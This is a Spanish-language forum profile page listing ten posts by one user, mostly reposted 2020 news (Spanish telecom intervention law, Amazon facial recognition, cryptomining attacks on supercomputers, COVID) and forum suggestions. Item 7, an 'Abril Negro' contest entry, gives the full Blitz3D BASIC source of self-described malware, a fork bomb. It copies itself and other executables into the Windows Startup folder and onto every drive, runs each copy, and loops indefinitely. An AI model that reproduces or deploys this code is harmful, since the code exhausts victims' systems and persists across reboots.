elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de


  Mostrar Temas
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 48
1  Foros Generales / Foro Libre / Noticia; El Gobierno podrá intervenir Whatsapp para enviar mensajes masivos en: 23 Septiembre 2020, 19:52
Con permiso, quisiera añadir una noticia relacionada con tecnología que, bueno, creo que le puede interesar a gran parte de los usuarios del foro.

FUENTE; https://www.elnacional.cat/es/politica/gobierno-intervenir-whatsapp-mensajes-masivos_540660_102.html

Noticia; El Gobierno podrá intervenir Whatsapp para enviar mensajes masivos

El Gobierno podrá intervenir servicios como Whatsapp y Telegram para difundir mensajes entre la población en el caso de situaciones excepcionales. Lo podrá hacer en el marco del anteproyecto de la Ley de telecomunicaciones.

Este anteproyecto, tal como avanza el digital Vozpopuli, también dará permiso al ejecutivo de Sánchez para intervenir las redes de los operadores. "Esta facultad excepcional y transitoria de gestión directa o intervención podrá afectar a cualquier infraestructura, recurso asociado o elemento o nivel de la red o del servicio que resulte necesario para preservar o restablecer el orden público, a la seguridad pública o la seguridad nacional", apunta el texto del anteproyecto.

Paco Pérez Bes, socio de Derecho Digital de Ecix Group, ha explicado al citado medio que el ejecutivo prevé una intervención puntual para difundir "mensajes y alertas oportunas durante una situación excepcional". Pérez considera que "la solución es aparentemente positiva y eficaz, siempre que esté amparada por una norma, y se haga de manera excepcional y durante un tiempo concreto, aplicando todas las cautelas para que no se vean afectados derechos de terceros.

Un escenario que genera controversia
Sin embargo, Pérez Bes lamenta que el escenario puede generar controversia: "¿Qué es una situación excepcional y dónde acaba aquello transitorio?", se pregunta.

Este anteproyecto contempla otros aspectos como por ejemplo que las OTT (plataformas que pueden transmitir audio, vídeo y contenidos a través de internet sin la implicación de los operadores tradicionales en el control) abonen una tasa si superan el millón de euros de ingresos por servicios sin numeración propios de los operadores. Es decir, aquellos que sin ser operadores tradicionales permitan, entre otras cosas, hacer llamadas, videollamadas o enviar mensajes y facturen más de un millón de euros.

Este nuevo abono afectará a WhatsApp, Facebook, a Twitter o Instagram si facturan más de un millón de euros por estos tipos de servicio.


-----------------------------------------------------------------------------------------------------

Dicho sea de paso, añadir que esta  noticia tambien ha aparecido en otros medios que quisiera añadir para contrastar informacion;

FUENTE;  https://www.larazon.es/economia/20200923/iz2nnvzpsvbqpluxaxcg6fgp4q.html


El Gobierno se prepara para los escenarios más preocupantes y ultima una ley para controlar no solo las calles sino también las comunicaciones ante problemas de orden público. Así, el Estado podrá asumir la gestión directa o intervenir las redes y servicios de comunicaciones electrónicas con carácter excepcional y transitorio si hay riesgo para el orden público, la seguridad pública o a la seguridad nacional. De esta forma, podrá intervenir servicios de mensajería como WhatsApp o Telegram para difundir mensajes en situaciones de emergencia.

El anteproyecto de la nueva Ley general de Telecomunicaciones, que estará en audiencia pública hasta el 13 de octubre y que constituye una de las principales medidas de la Agenda España Digital 2025 presentada por el Ejecutivo el pasado mes de julio, contempla este escenario para los proveedores de servicios de comunicaciones interpersonales cuando tengan asignada la obligación de transmitir alertas públicas en caso de grandes catástrofes o emergencias inminentes o en curso.

El Gobierno ha explicado que para estos casos excepcionales se podrá asumir la gestión directa o la intervención de cualquier infraestructura, recurso o elemento de la red o del servicio que resulte necesario para preservar el orden público, la seguridad pública y la seguridad nacional. En el caso de incumplimiento de estas obligaciones de servicio público, el Gobierno podrá acordar que la Administración General del Estado asuma la gestión directa o intervenga los correspondientes servicios o la explotación de las redes. Todo ello, igualmente con carácter excepcional y transitorio, según se recalca en el anteproyecto.

Control de la CNMC
Para ello será necesario previamente un informe preceptivo de la Comisión Nacional de los Mercados y de la Competencia (CNMC). Estas decisiones las podrá adoptar el Gobierno por propia iniciativa o a instancia de una administración pública competente. En este último caso, será preciso que la administración pública tenga competencias en materia de seguridad o para la prestación de los servicios públicos afectados por el “anormal” funcionamiento del servicio o de la red de comunicaciones electrónicas.

Por su parte, las redes, servicios, instalaciones y equipos de telecomunicaciones que desarrollen actividades esenciales para la defensa nacional se reservan al Estado y se rigen por su normativa específica. De hecho, los ministerios de Defensa y de Asuntos Económicos y Transformación Digital coordinarán la planificación del sistema de telecomunicaciones de las Fuerzas Armadas, a fin de asegurar su compatibilidad con los servicios civiles.

Por lo que respecta al uso de las telecomunicaciones, en los ámbitos del orden público, la seguridad pública, la seguridad vial o la protección civil, el Ministerio de Asuntos Económicos y Transformación Digital cooperará con el de Interior y con los órganos responsables de las comunidades autónomas con competencias en la materia. El anteproyecto también regula el servicio de comunicaciones de emergencias sobre el que se apoya el número 112. Así, se contempla la posibilidad de usar los datos de localización del que realiza la llamada, así como la posibilidad de implementar un sistema de alertas públicas.

Además de regular el sector de las telecomunicaciones, uno de los objetivos de esta ley es el de trasponer la directiva de la UE del Código de las Comunicaciones Electrónicas, para lo que había de plazo hasta este 31 de diciembre. El Gobierno prevé que este anteproyecto pueda entrar en el parlamento a comienzos de 2021 y que la ley esté aprobada a finales del segundo trimestre de 2021 o a principios del tercero.


---------------------------------------------------------------------------------------------------

Por ultimo, y, con permiso, quisiera añadir una ultima noticia del 2019 que esta relacionada con este tema;

FUENTE;:  https://www.eldiario.es/tecnologia/gobierno-intervenir-servicios-digitales-amenazan_1_1270723.html

NOTICIA; El Gobierno podrá intervenir servicios digitales si amenazan al orden público

El Ejecutivo podrá intervenir redes y servicios de comunicación electrónica si afectan al orden público, la seguridad pública o la seguridad nacional
El Decreto-ley fue aprobado en Consejo de Ministros el pasado viernes y modifica la Ley de Seguridad Ciudadana (ley mordaza) y la Ley General de Telecomunicaciones. Pedro Sánchez lo justificó en la necesidad de parar la "República Digital Catalana"
También permite al Ministerio de Economía cerrar webs si considera que crean "graves problemas económicos u operativos a otros proveedores o usuarios de redes"


El Gobierno, con carácter excepcional y transitorio, podrá acordar la asunción por la Administración General del Estado de la gestión directa o intervención de las redes y servicios de comunicaciones electrónicas en determinados supuestos excepcionales. Estos escenarios son: que puedan afectar al orden público, la seguridad pública, la seguridad nacional o creen graves perjuicios económicos.


"En concreto, esta facultad excepcional y transitoria de gestión directa o intervención podrá afectar a cualquier infraestructura, recurso asociado o elemento o nivel de la red o del servicio que resulte necesario para preservar o restablecer el orden público, la seguridad pública y la seguridad nacional". Así lo señala el texto del Real Decreto-ley 14/2019 de 31 de octubre, por el que se adoptan medidas urgentes por razones de seguridad pública en materia de administración digital, contratación del sector público y telecomunicaciones, y que este martes aparece publicado en el BOE.

El decreto, que fue aprobado el pasado viernes en Consejo de Ministros, fue justificado por Pedro Sánchez como necesario para parar el desarrollo de la "República Digital Catalana". El texto definitivo no cita ese concepto ni los disturbios de Barcelona pero hace referencia a "los recientes y graves acontecimientos acaecidos en parte del territorio español", que considera que "han puesto de relieve la necesidad de modificar el marco legislativo vigente para hacer frente a la situación", argumenta el Gobierno en las disposiciones generales. Este Real Decreto-ley modifica varias leyes, entre ellas la General de Telecomunicaciones de 2014.

En esa ley ya se hablaba de la posibilidad de que el Ejecutivo, también con carácter excepcional y transitorio, pudiera acordar la asunción por parte de la Administración de la gestión directa de determinados servicios o de la explotación de ciertas redes de comunicaciones electrónicas para garantizar la seguridad pública y la defensa nacional.

Ahora se añade una nueva redacción del apartado y se habla de gestión directa o de intervención en los supuestos que puedan afectar al orden público, la seguridad pública y nacional.

Esta decisión se podrá adoptar por propia iniciativa del Gobierno o a instancias de una administración pública competente; en este último caso será preciso que esta administración, por ejemplo, tenga competencias en materia de seguridad.

También permite al Ministerio de Economía cerrar páginas web y servicios digitales si considera que considere que crean "graves problemas económicos u operativos a otros proveedores o usuarios de redes o servicios de comunicaciones electrónicas o demás usuarios del espectro radioeléctrico".

En cuanto el proceso sancionador, el Real Decreto-ley da una nueva redacción a uno de sus apartados: "Previamente al inicio del procedimiento sancionador, podrá ordenarse por el órgano competente del Ministerio de Economía y Empresa, mediante resolución sin audiencia previa, el cese de la presunta actividad infractora cuando existan razones de imperiosa urgencia basada en alguno de los siguientes supuestos".

Introduce, entre ello, el de la amenaza inmediata y grave para el orden público, seguridad pública o nacional o cuando exista una amenaza inmediata y grave para la salud pública.

El nuevo decreto incluye un apartado nuevo al artículo de la ley de 2014 que se refiere a los requisitos exigibles para la explotación de las redes y la prestación de los servicios de comunicaciones electrónicas.

Así, las Administraciones Públicas deberán comunicar al Ministerio de Economía y Empresa todo proyecto de instalación o explotación de redes de comunicaciones electrónicas en régimen de autoprestación que haga uso del dominio público, tanto si dicha instalación o explotación va a realizarse de manera directa, a través de cualquier entidad o sociedad dependiente de ella.

Todo ello se contempla en el capítulo de las medidas para reforzar la seguridad en materia de telecomunicaciones, mientras que en el capítulo de las medidas en materia de identificación electrónica y ubicación de determinadas bases de datos, el nuevo Real Decreto-ley dice que deberán ubicarse y prestarse dentro del territorio de la UE.

"Los sistemas de información y comunicaciones para la recogida, almacenamiento, procesamiento y gestión del censo electoral, los padrones municipales de habitantes y otros registros de población, datos fiscales relacionados con tributos propios o cedidos y datos de los usuarios del sistema nacional de salud, así como los correspondientes tratamientos de datos personales, deberán ubicarse y prestarse dentro del territorio de la UE".

Los datos a que se refiere el apartado anterior no podrán ser objeto de transferencia a un tercer país u organización internacional, con excepción de los que hayan sido objeto de una decisión de adecuación de la Comisión Europea o cuando así lo exija el cumplimiento de las obligaciones internacionales asumidas por España.

Las entidades públicas tienen un plazo máximo de seis meses a partir de mañana para cumplir con esta obligación.
2  Media / Juegos y Consolas / ¿Alternativas gratuitas al Minecraft? en: 20 Septiembre 2020, 21:10
Hola, veréis, quisiera abrir este tema para preguntar una cosa sobre el Minecraft; ¿que alternativas gratuitas existen a este videojuego?.

Por otra parte, también quisiera hacer esta pregunta para saber si existen otras "alternativas similares" aparte del videojuego Minecraft, claro esta.

Muchas gracias por vuestra atención, y, bueno, saludos.
3  Foros Generales / Sugerencias y dudas sobre el Foro / Sugerencia: sección de noticias no relacionadas con informatica en: 4 Septiembre 2020, 13:29
Hola, veréis; quisiera abrir este tema para hacer una sugerencia para el foro.

Entonces, y, teniendo en cuenta que se esta publicando noticias noticias no relacionadas con la informática en el foro libre desde hace bastante tiempo, quisiera sugerir la posibilidad de crear una nueva sección del foro destinada para este tipo de noticias.

Obviamente, la idea seria añadirla dentro de la sección del foro libre.

Y, bueno, espero no causar demasiadas molestias al abrir este tema, y mas teniendo en cuenta las peticiones que se hicieron en su momento pidiendo crear una nueva sección relacionada con X tema.

Muchas gracias por vuestra atención, y, bueno, saludos....
4  Foros Generales / Sugerencias y dudas sobre el Foro / Problemas con el buscador del foro en: 20 Agosto 2020, 21:33
Hola, veréis, quisiera abrir este tema para informar sobre un problema con el buscador del foro, y, por otra parte, para preguntar si a alguien mas le ha ocurrido lo mismo.

Entonces, y, yendo al tema principal; el caso es que he accedido a este para para intentar encontrar un tema antiguo, y, bueno, después de poner las palabras clave y intentar iniciar la búsqueda me ha aparecido el siguiente error;


¡Un error ha ocurrido!
Unable to access the search deamon.



Muchas gracias por vuestra atención, y, bueno, saludos.
5  Foros Generales / Foro Libre / NOTICIA: Amazon suspende temporalmente el uso policial de su software de reconoc en: 13 Junio 2020, 21:02
Con permiso, quisiera añadir una noticia sobre tecnología que, bueno, espero que os interese, por eso:


FUENTE:  https://www.muycomputer.com/2020/06/11/reconocimiento-facial-amazon/


NOTICIA:   Amazon suspende temporalmente el uso policial de su software de reconocimiento facial



Amazon ha anunciado una moratoria de un año en el uso policial de su software de reconocimiento facial, Rekognition. Una herramienta tan poderosa como controvertida, que se ha enfrentado a duras críticas de las organizaciones pro-derechos civiles y de los mismos empleados de Amazon.


El asesinato de George Floyd apunta a convertirse en un símbolo para intentar cambiar las cosas. Las protestas masivas por los abusos policiales y la respuesta con el movimiento Black Lives Matter está presionando a los políticos estadounidenses (y a otros de varios países), al gobierno de Trump que ha bajado varios puntos en las encuestas (en año electoral) y también a las grandes tecnológicas que colaboran y que para los críticos son co-responsables del uso de unas soluciones muy peligrosas en manos equivocadas.


Las tecnologías de reconocimiento facial han avanzado de manera extraordinaria la última década y hoy, son sencillas de obtener, desplegar y usar. Los ejemplos de su uso en consumo van desde el Face ID del iPhone X y sistemas similares en otros smartphones, al Windows Hello mediante cámaras IR en equipos con Windows 10 compatibles, pasando por el etiquetado automático de Facebook.


Como otras tecnologías -véase la problemática de la Inteligencia Artificial- su uso tiene ventajas e inconvenientes. El Congreso estadounidense lleva meses sopesando la regulación de su uso y hace unos días los demócratas introdujeron un proyecto de ley de reforma policial que, entre otras cosas, prohibiría el uso del reconocimiento facial en tiempo real sin la aprobación judicial. Si bien hay escenarios de uso positivos, su uso para espionaje masivo y detección de manifestantes también es conocido.



Reconocimiento facial y las grandes tecnológicas
Amazon lleva años enfrentándose a duras críticas por suministrar tecnología de reconocimiento facial a las fuerzas policías sin ningún tipo de garantías y control de un uso ético y seguramente legal. La herramienta Rekognition, que funciona con el respaldo de la empresa de computación en nube de Amazon, AWS, es una de las poderosas que existen y puede reconocer hasta 100 caras en tiempo real en un segundo.


Documentos obtenidos por la Unión Estadounidense de Libertades Civiles mediante una petición por la Ley de Libertad de Información, reveló que estaba siendo usada para vigilancia masiva que podría afectar sobre todo a los colectivos y comunidades más vulnerables, ciudadanos que no son blancos e inmigrantes. Las peticiones para que Amazon dejase de suministrar a los gobiernos este tipo de software han sido cuantiosas y no ha llegado hasta ahora. Eso sí, no se ha informado de cuándo comenzará la moratoria ni a qué fuerzas policiales o agencias afectará.


«Hemos abogado por que los gobiernos establezcan regulaciones más estrictas para gobernar el uso ético de la tecnología de reconocimiento facial, y en los últimos días, el Congreso parece estar listo para asumir este desafío», dicen desde Amazon. «Esperamos que esta moratoria de un año pueda darle al Congreso suficiente tiempo para implementar las reglas apropiadas, y estamos listos para ayudar si lo solicitan».


La Unión Estadounidense de Libertades Civiles no está satisfecha. «La amenaza de esta tecnología de vigilancia para nuestros derechos y libertades civiles no desaparecerá en un año», ha escrito la directora de tecnología de la organización. «Amazon debe comprometerse completamente con una moratoria general sobre el uso de reconocimiento facial por parte de las fuerzas del orden público hasta que los peligros puedan abordarse por completo, y debe presionar al Congreso y a los legisladores de todo el país para que hagan lo mismo».


Y no solo Amazon está presionada. Google perdió un importante contrato ante la «rebelión» de 4.000 empleados que firmaron una petición interna en el que exigían a su compañía la salida del Project Maven, un programa militar de inteligencia artificial y aprendizaje automático impulsado por el Departamento de Defensa de Estados Unidos con objetivos como clasificar automáticamente imágenes de objetos y personas para uso militar.


300 expertos en robótica, inteligencia artificial, relaciones internacionales, seguridad, ética y derecho, pusieron en el punto de mira a todas las tecnológicas con una carta abierta en la que exigían una regulación precisa y responsabilidad corporativa-ética. «Los contratos del Departamento de Defensa señalan una peligrosa alianza entre la industria tecnológica privada, actualmente en posesión de grandes cantidades de datos personales confidenciales recabados de personas de todo el mundo, y el ejército de un país».


IBM envió esta semana un documento a los legisladores para anunciar que suspendía la comercialización general de su tecnología para estos usos. Y falta Microsoft, otra compañía muy criticada por estos usos con enormes contratos gubernamentales, pero que también había pedido una regulación. «La tecnología de reconocimiento facial le da a los gobiernos un poder sin precedentes para espiarnos», recalcan desde la Unión Estadounidense de Libertades Civiles. «Instamos a Microsoft y otras compañías a unirse a IBM, Google y Amazon para avanzar hacia el lado correcto de la historia».
6  Foros Generales / Foro Libre / Noticia; Atacan varios superordenadores europeos que investigan el Covid-19 en: 27 Mayo 2020, 17:10
Con permiso, quisiera aprovechar para compartir una noticia de hace unos dias (mas concretamente, del 18/05/2020 días) donde, según comentan, se ha realizado un ciberataque a varios superordenadores ubicados en varios países de Europa, si no es molestia, claro esta;

FUENTE; https://cronicaglobal.elespanol.com/creacion/vida-tecky/atacan-varios-superordenadores-europeos-investigan-covid-19_348765_102.html[/i]]https://cronicaglobal.elespanol.com/creacion/vida-tecky/atacan-varios-superordenadores-europeos-investigan-covid-19_348765_102.html


NOTICIA:  Atacan varios superordenadores europeos que investigan el Covid-19
Lo ciberdelincuentes habrían tomado el control de estas máquinas con el objetivo de minar la criptodivisa Monero



18.05.2020 13:15 h. Actualizado: 18.05.2020 16:28 h.



Varios superordenadores europeos han sido víctimas de un ciberataque que buscaba utilizar su potencia para minar criptomonedas y que en muchos casos ha obligado a desconectarlos. Estos ciberataques se produjeron desde comienzos de la pasada semana y han afectado a superordenadores de Reino Unido, Alemania y Suiza, todos ellos pertenecientes a universidades y centros de investigación.

Asimismo, el investigador de seguridad Felix von Leiner ha señalado que estos ataques también habrían podido afectar al Marenostrum de Barcelona. Sin embargo, fuentes próximas al superordenador de la capital catalana aseguran a este medio que "no ha sido víctima".

La criptomoneda Monero
Según la compañía de ciberseguridad Cado Security, en todos estos superordenadores se empleó una misma vulnerabilidad y el mismo tipo de malware para minar la criptodivisa Monero. Además, uno de los superordenadores afectados es el Archer, situado en la Universidad de Edimburgo (Reino Unido), que se estaba utilizando para la lucha contra el Covid-19. De hecho, según ha confesado la universidad escocesa, el ataque obligó a detener el funcionamiento del superordenador.

Pero no ha sido la única. BwHPC, que gestiona los superodenadores de las universidades del estado alemán de Baden-Wurtemberg, confirmó también que tuvo que detener cinco de ellos debido a esta amenaza.

Y los incidentes han afectado, asimismo, al Centro de Supercomputación Leibniz de Múnich, la Universidad de Dresde y el Centro de Investigación Julich (todos de Alemania), así como el Centro Suizo de Computación Científica en Zúrich.




-----------------------------------------------------------------------------------------------------


Personalmente creo que los autores han pasado un limite que nadie debería pasar nunca para conseguir criptomonedas, y mas si tenemos en cuenta que estos superordenadores se estaban utilizando para investigaciones relacionadas sobre el COVID-19... :-\ :-\ :-\ :-\ :-\


Muchas gracias por vuestra atención, y, bueno, saludos.
7  Seguridad Informática / Abril negro / Abril Negro 2020 - malwaretipo Bomba Fork en: 6 Abril 2020, 20:35
Con permiso, quisiera aprovechar para abrir este tema y presentar mi programa/malware para el Abril Negro;

Autor: crazykenny.

Categoria; Malware

Nombre de la herramienta/píldora: Bomba fork en lenguaje BASIC.

Lenguaje(s) en los que esta diseñado: Blitz 3D.

(con permiso, quisiera añadir una cita de wikipedia:

https://es.wikipedia.org/wiki/Blitz_BASIC

Aunque originalmente, los derechos de distribución pertenecían a Indigicon, más tarde Blitz Research Ltd. firmó un trato con Indigicom para permitir a Blitz Research Ltd. que distribuyan Blitz3D. A cambio, se le dieron a Indigicon los derechos de distribución de Blitz BASIC y limpiar cualquier copia sobresaliente de Blitz3D.

El 4 de agosto de 2014, se lanzó Blitz3D como código abierto.)

Enlace GitHub: https://github.com/blitz-research/blitz3d

Descripción del trabajo:

Básicamente, la idea de este trabajo es crear un programa "similar" a una Bomba Fork para ser ejecutada en sistemas operativos Windows "desprotegidos" y realizando las siguientes acciones:

-Copiarse a si mismo y a todos los ejecutables que estén dentro de la carpeta de la aplicación en la siguiente carpeta: "C:/ProgramData\Microsoft\Windows\Start Menu\Programs\Startup". Por supuesto, esta acción tiene dos objetivos:

1) Poder realizar copias del archivo .exe en la misma carpeta para luego ejecutarlas pero con un nombre diferente para luego ejecutarlas.

2) Intentar mantener el programa y sus "copias" en ejecución después de reiniciar el sistema

-Hacer varias copias de si mismo veces en otras unidades de almacenamiento del sistema para luego ejecutarlas. Por motivos obvios, se han descartado las unidades de disquete (A:\ y B:\).

-Ejecutarse despues de realizar una copia en las siguientes carpetas y unidades antes menciondadas.

Captura de pantalla (en el caso de tener interfaz): no disponible.

Link de descarga que contendrá el código fuente y el archivo ejecutable (en caso de consistir en un binario ejecutable):

Codigo origial del programa: https://foro.elhacker.net/analisis_y_diseno_de_malware/ejemplo_bombas_fork-t500373.0.html

Codigo actualizado del programa:


Código:
;Utilizo SeedRnd y Millisecs() para intentar obtener valores aleatorios
;con el comando rand() y rnd()
SeedRnd MilliSecs()
;genero un valor aleatorio para añadirlo a la barra de "titulo" del programa.
tit#=Rand(0,999999999999)
;convierto el valor a string
num$=Str tit#
;cambio el nombre de la barra de titulo
AppTitle num$
;genera una lista de unidades excluyendo las unidades A:\ y B:\ reservadas para disqueteras.
;inicialmente, creamos las matrices que usaremos en el programa
;para evitar errores de compilacion.
Dim exe_list$(0,0)
Dim exe_list_0_b$(0,0)
Dim unit$(24)
unit$(0)="ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
unit$(1)="C:\"
unit$(2)="D:\"
unit$(3)="E:\"
unit$(4)="F:\"
unit$(5)="G:\"
unit$(6)="H:\"
unit$(7)="I:\"
unit$(8)="J:\"
unit$(9)="K:\"
unit$(10)="L:\"
unit$(11)="M:\"
unit$(12)="N:\"
unit$(13)="O:\"
unit$(14)="P:\"
unit$(15)="Q:\"
unit$(16)="R:\"
unit$(17)="S:\"
unit$(18)="T:\"
unit$(19)="U:\"
unit$(20)="V:\"
unit$(21)="W:\"
unit$(22)="X:\"
unit$(23)="Y:\"
unit$(24)="Z:\"
;comprueba el directorio actual
dir_actual$=CurrentDir()
;comprobacion de archios del directorio actual.
dir_act=ReadDir(dir_actual$)
.chk_file
file_act$=NextFile$(dir_act)
If file_act$=""
;si no se encuentran mas archivos, salta a la sección de copiar archivos
;a la carpeta para ejecutar programas al iniciar windows.
;como nota, se reducira en uno el valor de la variable "cant_exe#" para
;evitar acceder a posiciones no validas de las matrices que se han creado
cant_exe#=cant_exe#-1
Goto ejecucion
EndIf
;usa la variable extens$ para comprobar toda (o parte) de la extension del archivo
extens$=Right$(file_act$,4)
If extens$=".exe"
;si la extension del archivo es .exe guarda la ruta del archivo en una matriz
;para fijar el tamaño de la matriz, se utilizara la variable cant_exe#; Se
;le asignara el valor 0 en caso de que no se haya creado, y, despues de
;crearla y/o añadirle nuevos archivos, su valor se incrementara en 1.
;Obviamente, se le restara 1 a su valor cuando se necesite acceder a todos los
;datos de la matriz.
If cant_exe#=0
;si no se ha creado la matriz, se crea antes de añadirle la ruta del archivo.
Dim exe_list$(0,2)
exe_list$(0,0)=dir_actual$=dir_actual$+file_act$
exe_list$(0,1)=file_act$
cant_exe#=cant_exe#+1
EndIf
If cant_exe#>0
;si ya existe, y, dado que al volver a crear una matriz se borran los datos de esta,
;se crea una segunda matriz para volcar la informacion.
cant_exe#=cant_exe#-1
Dim exe_list_0_b$(cant_exe#,1)
For count#=0 To cant_exe#
For con_2#=0 To 1
exe_list_0_b$(count#,con_2#)=exe_list$(count#,con_2#)
Next
Next
cant_exe#=cant_exe#+1
Dim exe_list$(cant_exe#,2)
cant_exe#=cant_exe#-1
;Con la 1a matriz redimensionada, se vuelve a copiar la informacion en esta.
For count#=0 To cant_exe#
For con_2#=0 To 1
exe_list$(count#,con_2#)=exe_list_0_b$(count#,con_2#)
Next
Next
cant_exe#=cant_exe#+1
EndIf
EndIf
Goto chk_file
.ejecucion
;en esta parte, se utilizara la lista de unidades (posicion 1 a 24 de la matriz unit$())
;mas la ruta indicada en la posicion "0" para localizar el directorio %StartUp%
For count#=1 To 24
dir_destino$=unit$(count#)+unit$(0)
If FileType(dir_destino$)=2
;si se ha encontrado y es el directorio actual del programa, se pasara
;a la ultima parte del programa.
;como nota, utilizaremos el comando goto para saltar a la etiqueta autoruning
If dir_actual$=dir_destino$
Goto autoruning
EndIf
;si se ha encontrado se pasara a copiar los .exe a este directorio
;y se usa la variable "system_pos#" para marcar la posicion de la
;matriz que hemos usado para copiar los archivos.
system_pos#=count#
For count_2#=0 To cant_exe#
exe_list$(count_2#,2)=dir_destino$+exe_list$(count_2#,1)
;antes de copiar el archivo, hacemos una comprobacion
;para ver si ya existe.
;en caso de que exista, hacemos un pequeño salto en el
;programa para evitar copiarlo y evitar posibles errores.
If FileType(exe_list$(count_2#,2))=1
Goto evitar_copia_00
EndIf
CopyFile exe_list$(count_2#,0),exe_list$(count_2#,2)
.evitar_copia_00
;por otra parte, con la siguiente linea se ejecutaran los archivos
;que se han copiado (entre ellos, este programa):
ExecFile(exe_list$(count_2#,2))
Next
EndIf
Next
.autoruning
;vuelvo a generar un valor aleatorio para añadirlo a la barra de "titulo" del programa.
tit#=Rand(0,999999999999)
;vuelvo a conviertir el valor a string
num$=Str tit#
;vuevlo a cambiar el nombre de la barra de titulo
AppTitle num$
;independientemente de si se han ejecutado o no los archivos que hemos copiado,
;se intentaran dos cosas para, digamos, "forzar" un reinicio y hacer que
;los archivos se ejecuten al arrancar SO.
;lo primero que se intentara es ejecutar los programas que se han encontrado
;en la carpeta de este programa:
For tr#=0 To cant_exe#
ExecFile(exe_list$(tr#,0))
Next
;la segunda opcion es intentar copiar este programa a otras
;unidades disponibles en el equipo de la siguiente forma:
;utilizamos un bucle for para intentar acceder a la lista
;de unidades
For tr#=0 To 24
;comprobamos con filetype si esta disponible la unidad.
;en caso de no estar disponible la unidad de almacenamiento
;indicada en unit$(tr#), se usara goto para saltar a la
;etiqueta "sig_unit" y pasar a la siguiente unidad
;indicada en la matriz.
If FileType(unit$(tr#))=0
Goto sig_unit
EndIf
;se utiliza otro bucle for y la variable unidad_final
;para indicar la ruta de destino de cada ejecutable.
For trr#=0 To cant_exe#
;como paso adicional, se intentara utilizar numeros
;para generar un nombre al azar en cada pasada para,
;digamos, initentar evitar nombres de archivo repetidos.
;No obstante, se aprovechara el codigo que he hecho para cambiar
;el nombre de la barra de titulo del programa para generar
;el nombre de archivo.
;genero un valor aleatorio para añadirlo a la barra de "titulo" del programa.
tit#=Rand(0,999999999999)
;convierto el valor a string
num$=Str tit#
;cambio el nombre de la barra de titulo
AppTitle num$
unidad_final$=unit$(tr#)+num$
;antes de copiar el archivo, hacemos una comprobacion
;con filetype() para evitar cpoiar un archivo con el mismo nombre.
;Si se da el caso y existe un archivo con el mismo nombre,
;lo ejecutamos y utilizamos el comando goto para saltar a la
;etiqueta "evitar_copia_01" y pasar al siguiente archivo.
If FileType(unidad_final$)=1
ExecFile(exe_list$(tr#,0))
Goto evitar_copia_01
EndIf
;en caso de que no exista un archivo con el nuevo nombre
;se copiara y ejecutara el archivo:
CopyFile exe_list$(0,1),unidad_final$
ExecFile(exe_list$(tr#,0))
.evitar_copia_01
Next
.sig_unit
Next
;por ultimo, se volovera a utilizar el comando goto para
;mantener este proceso indefinidamente saltando a la
;etiqueta "autoruning"
Goto autoruning
8  Foros Generales / Sugerencias y dudas sobre el Foro / Sobre unir los temas del coronavirus en: 18 Marzo 2020, 14:09
Hola, veréis, quisiera abrir este tema porque quisiera preguntar/sugerir una cosa en relación con los temas que van apareciendo sobre el coronavirus, claro esta:

Entonces, y, viendo la cantidad de temas que se van creando sobre el coronavirus, quisiera preguntar/sugerir si seria posible unir todos los temas en uno solo, en el sentido de hacer lo mismo que con los temas relacionados con Venezuela.

Y, bueno, lo comento porque el unir todos los mensajes en un solo tema podría ser utilidad para organizar la información sobre este y para los usuarios que quieran mantenerse al día con respecto a este tema, ya que se evitaría que estén buscando la información en varios temas.

Muchas gracias por vuestra atención, y, bueno, saludos.
9  Foros Generales / Foro Libre / Noticia: El primer caso de coronavirus en Barcelona, una mujer que había estad en: 25 Febrero 2020, 16:38
Con permiso, y, ya que ultimamente se esta hablando bastante del coronavirus, quisiera aprovechar para compartir una noticia sobre este tema donde, bueno, parece que se ha dado el primer caso del coronavirus aqui, en Catalunya;

FUENTE: https://elcaso.elnacional.cat/es/sucesos/caso-coronavirus-barcelona-italia-mujer_27473_102.html


NOTICIA:   El primer caso de coronavirus en Barcelona, una mujer que había estado en Italia




El departamento de Salud de la Generalitat de Catalunya ha confirmado esta tarde que se ha detectado un caso de coronavirus en Barcelona.

Se trata, según fuentes del ministerio de Salud, una mujer residente en la capital de Catalunya que hace pocas semanas estuvo en el norte de Italia, donde se ha registrado el brote más peligroso del Covid-19 fuera de China. Se trata del primer caso declarado en la península después de los tres positivos en Canarias y en las Islas Baleares.






Más información del caso
El secretario de Salud Pública, Joan Guix, informará en rueda de prensa esta tarde acompañado por la gerente de procesos integrales de salud del Servicio Catalán de la Salud, Assumpta Ricard.

El gobierno español: "Todo está preparado"
Poco antes de confirmarse este caso, Carmen Calvo, vicepresidenta del Gobierno de España, ha pedido tranquilidad y ha asegurado que el Ejecutivo actuara con "medida, proporcionalidad y transparencia" y que ofrecerá información médica y técnica a los ciudadanos. También ha asegurado que "tenemos un gran sistema sanitario, nos hemos enfrentado a crisis similares y las hemos resuelto".






Por su parte, la delegada del Gobierno en Cataluña, Teresa Cunillera, ha asegurado que "todo está preparado" por si hubiera necesidad en caso de coronavirus. Además, pide no generar alarma: "Los hospitales están en plena prevención, pero no es bueno generar alarmas. Podemos estar tranquilos", según recoge Radio 4.

Hace menos de 24 horas se confirmó un nuevo caso en España: un turista italiano que está de vacaciones en Tenerife. Un millar de personas han tenido que ser aislado en el hotel donde estaba el médico italiano.

 

10  Foros Generales / Sugerencias y dudas sobre el Foro / Duda sobre fake news en el foro en: 10 Febrero 2020, 23:05
Hola, vereis, quisiera abrir este tema para hacer una pregunta relacionada con las reglas del foro, si no es molestia, claro esta.

Entonces, el caso es que acabo de hacer una revisión rápida de las reglas del foro, y, bueno, al no ver ninguna mención directa a las fake news, y, digamos, a los problemas que pueden llegar a generar estas, quisiera plantear la siguiente pregunta; siguiendo las reglas del foro, ¿que medidas se aplicarían en caso de que se publique una o mas fake news que pueda causar problemas a otras personas?.

Por otra parte, se que es una duda un tanto "espontanea", pero es algo que me ha llamado la atención al ver las reglas del foro, y, bueno, a ser posible quisiera plantear esta pregunta.

Muchas gracias por vuestra atención, y, bueno, saludos.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 48
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines